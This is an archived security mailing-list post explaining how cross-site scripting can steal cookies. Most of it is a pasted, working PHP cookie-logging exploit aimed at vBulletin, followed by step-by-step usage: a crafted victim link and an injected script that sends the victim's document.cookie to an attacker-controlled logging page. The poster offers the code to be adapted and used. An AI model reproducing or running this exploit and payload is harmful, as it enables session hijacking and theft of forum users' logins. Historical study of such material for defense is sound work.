[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY2-F46b6KZmcK8r6b0000036a@hotmail.com>
From: bobbymanly at hotmail.com (bobby manly)
Subject: Search Engine XSS
>
>So why not show one of these legitimate examples instead of the overused
>window popup script?
>
>It would just be easier to ascertain the level of severity if an actual DoS
>string or this "trusted internal call" was exploited.
>
>I am sure there are a lot of forms that can be a victim of a xss string,
>but how many of them can actually be used for anything useful (from an
>attacker point of view)?
>
XSS can be used for a few different things, one of which would be to steal
cookies / logins
(please read cgisecurity.com stuff.. )
i believe some of the reason dat w00d gets so much shit is because some of
those XSS don't mean shit unless it targets an admin that is somehow logged
in with valid stuffz in his cookie (but i did learn some other cool iframe
stuff from him (and others) so _i_ don't give him shit))(did i miss a ')'?)
. heh
anyways, there are some web stuff that stores to much stuff in the cookie
(or insecurely) such as logins,
so you can do a document.location and add the document.cookie as variables
... and send his cookie somewhere (usually have to get them to click a link
on site, in email, etc) and you can have a nice lil php to grab cookie
content and then redirect to a new site.. here is some code that has helped
me to lurn.. it's not specific to this vbulletin exploit (well kinda).. here
is what was posted to the net, you will have to modify to fit your needs..
credits in the code :
---------------------------
<?PHP
// vBulletin XSS Injection Vulnerability: Exploit
// ---
// Coded By : Sp.IC (SpeedICNet@...mail.Com).
// Descrption: Fetching vBulletin's cookies and storing it into a log
file.
// Variables:
$LogFile = "Cookies.Log";
// Functions:
/*
If ($HTTP_GET_VARS['Action'] = "Log") {
$Header = "<!--";
$Footer = "--->";
}
Else {
$Header = "";
$Footer = "";
}
Print ($Header);
*/
Print ("<Title>vBulletin XSS Injection Vulnerability:
Exploit</Title>");
Print ("<Pre>");
Print ("<Center>");
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
Print ("Coded By: <B><A
Href=\"MailTo:SpeedICNet@...mail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
/*
Print ($Footer);
*/
Switch ($HTTP_GET_VARS['Action']) {
Case "Log":
$Data = $HTTP_GET_VARS['Cookie'];
$Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen
(DecHex (MD5 (NULL))))));
$Log = FOpen ($LogFile, "a+");
FWrite ($Log, Trim ($Data) . "\n");
FClose ($Log);
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0;
URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
Break;
Case "List":
If (!File_Exists ($LogFile) || !In_Array ($Records)) {
Print ("<Br><Br><B>There are No
Records</B></Center></Pre>");
Exit ();
}
Else {
Print ("</Center></Pre>");
$Records = Array_UniQue (File ($LogFile));
Print ("<Pre>");
Print ("<B>.:: Statics</B>\n");
Print ("\n");
Print ("o Logged Records : <B>" . Count
(File ($LogFile)) . "</B>\n");
Print ("o Listed Records : <B>" . Count ($Records) . "
</B>[Not Counting Duplicates]\n");
Print ("\n");
Print ("<B>.:: Options</B>\n");
Print ("\n");
If (Count (File ($LogFile)) > 0) {
$Link['Download'] = "[<A Href=\"" . $LogFile .
"\">Download</A>]";
}
Else{
$Link['Download'] = "[No Records in Log]";
}
Print ("o Download Log : " . $Link['Download'] . "\n");
Print ("o Clear Records : [<A Href=\"" . $SCRIPT_PATH.
"?Action=Delete\">Y</A>]\n");
Print ("\n");
Print ("<B>.:: Records</B>\n");
Print ("\n");
While (List ($Line[0], $Line[1]) = Each ($Records)) {
Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
}
}
Print ("</Pre>");
Break;
Case "Delete":
@UnLink ($LogFile);
Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or
Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
$HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
Break;
}
?>
- Give a victim this link:
member2.php?s=[Session]&action=viewsubscription&perpage=[Script Code]
- Note: You can replace [Script Code] with:
--><Script>location='Http://[Exploit
Path]?Action=Log&Cookie='+(document.cookie);</Script>
- Then go to Http://[Exploit Path]?Action=List
--------------------------------
what's funny, is that @ the time this came out, there was also script
injection possible in the <b> tag of the actual forum message, so you could
do some
OnMouse.over junk to help hide the actual url .. heh
.. i would say any XSS would be worth a look.. but not all will actually
get you shit
later,
kid
_________________________________________________________________
The new MSN 8: advanced junk mail protection and 2 months FREE*
http://join.msn.com/?page=features/junkmail
Powered by blists - more mailing lists